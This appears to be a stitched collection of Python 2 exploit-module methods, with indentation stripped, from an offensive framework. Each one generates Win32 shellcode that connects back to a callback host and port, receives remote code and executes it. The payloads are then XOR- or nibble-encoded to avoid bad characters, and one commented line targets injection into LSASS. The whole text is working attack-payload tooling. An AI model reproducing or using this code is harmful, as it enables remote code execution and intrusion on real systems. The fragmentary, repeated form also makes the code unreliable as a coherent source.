def createShellcode(self):
import shellcode.shellcodeGenerator as shellcodeGenerator
sc = shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval': 3000})
sc.addAttr('revert_to_self_before_importing_ws2_32', None)
sc.addAttr('tcpconnect', {
'port': self.callback.port,
'ipaddress': self.callback.ip
})
sc.addAttr('CreateThreadRecvExecWin32',
{'socketreg': 'FDSPOT'}) #MOSDEF
sc.addAttr('ExitThread', None)
rawshellcode = sc.get()
import encoder.xorencoder as xorencoder
encoder = xorencoder.simpleXOR()
encoder.setbadstring(self.badstring)
ret = encoder.find_key(rawshellcode)
if ret == 0:
self.log('Could not find a key for this shellcode!')
raise Exception, 'No shellcode generated'
self.shellcode = encoder.encode(rawshellcode)
if self.shellcode == '':
raise Exception, 'No shellcode generated'
self.log('Xor key used: %x' % (encoder.getkey()))
self.log('Length of shellcode=%s' % (len(self.shellcode)))
return self.shellcode
def createShellcode(self):
sc=shellcodeGenerator.win32()
sc.addAttr("findeipnoesp",{"subespval": self.subesp}) #don't mess with eip
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect",{"port":self.callback.port,"ipaddress":self.callback.ip})
sc.addAttr("CreateThreadRecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("ExitThread",None)
rawshellcode=sc.get()
print "[!] RAW Shellcode len: %d bytes" % len(rawshellcode)
#first encode to nibble
enc = nibble_encoder.intel_nibbleencoder()
bad = ""
for i in range(ord('A'),ord('Z')+1):
#for a-z inclusive, these are badchars
bad+=chr(i)
enc.setbadstring(bad)
rawshellcode = enc.encode(rawshellcode)
print "[!] Nibble Encoded Shellcode len: %d bytes" % len(rawshellcode)
#then do a xor enconding using the real badstring
encoder = xorencoder.simpleXOR()
encoder.setbadstring(self.badstring)
encoder.find_key(rawshellcode)
self.shellcode = encoder.encode(rawshellcode)
print "[!] Shellcode len: %d bytes" % len(self.shellcode)
if not len(self.shellcode):
return None
return self.shellcode
def createShellcode(self):
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp",
{"subespval": self.subesp}) #don't mess with eip
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {
"port": self.callback.port,
"ipaddress": self.callback.ip
})
sc.addAttr("CreateThreadRecvExecWin32",
{"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("TerminateThread", None)
rawshellcode = sc.get()
print "[!] RAW Shellcode len: %d bytes" % len(rawshellcode)
#then do a xor enconding using the real badstring
encoder = xorencoder.simpleXOR()
encoder.setbadstring(self.badstring)
encoder.find_key(rawshellcode)
self.shellcode = encoder.encode(rawshellcode)
print "[!] Shellcode len: %d bytes" % len(self.shellcode)
if not len(self.shellcode):
return None
return self.shellcode
def createShellcode(self):
self.createWin32ClientSideShellcode()
encoder = simpleXOR(key=0x3a)
encoder.setbadstring(self.badstring)
#self.shellcode = "\xcc" + encoder.encode(self.shellcode) + "\xcc"
self.shellcode = encoder.encode(self.shellcode)
def encodeshellcode(self, rawshellcode):
from encoder import xorencoder
encoder = xorencoder.simpleXOR()
encoder.setbadstring(self.badstring)
ret = encoder.find_key(rawshellcode)
if ret == 0:
self.log('Could not find a key for this shellcode!')
raise Exception, 'No shellcode generated'
self.shellcode = encoder.encode(rawshellcode)
if self.shellcode == '':
raise Exception, 'No shellcode generated'
self.log('Xor key used: %x' % (encoder.getkey()))
self.log('Length of shellcode=%d' % (len(self.shellcode)))
print repr(self.shellcode[:16])
return self.shellcode
def createShellcode(self):
#self.log('Creating shellcode to callback to %s:%s'%(self.callback.ip,self.callback.port))
#self.shellcode=self.createHeapSafeInjectIntoProcess(self.badstring,self.callback.ip,self.callback.port,smallcode=1,processname='LSASS.EXE',backupprocess='lsass.exe')
sc=shellcodeGenerator.win32()
sc.addAttr('findeipnoesp',None)
sc.addAttr('Fix RtlEnterCriticalSection',{'SimpleFix':1})
sc.addAttr('tcpconnect',{'port':self.callback.port,'ipaddress':self.callback.ip})
sc.addAttr('SmallRecvExecWin32',{'socketreg':'FDSPOT'}) #MOSDEF
rawshellcode=sc.get()
encoder=xorencoder.simpleXOR()
encoder.setbadstring(self.badstring)
ret=encoder.find_key(rawshellcode)
if ret==0:
self.log('Could not find a key for this shellcode!')
raise Exception,'No shellcode generated'
self.shellcode=encoder.encode(rawshellcode)
if self.shellcode=='':
raise Exception,'No shellcode generated'
self.log('Xor key used: %x'%(encoder.getkey()))
self.log('Length of shellcode: %d'%(len(self.shellcode)))
return self.shellcode
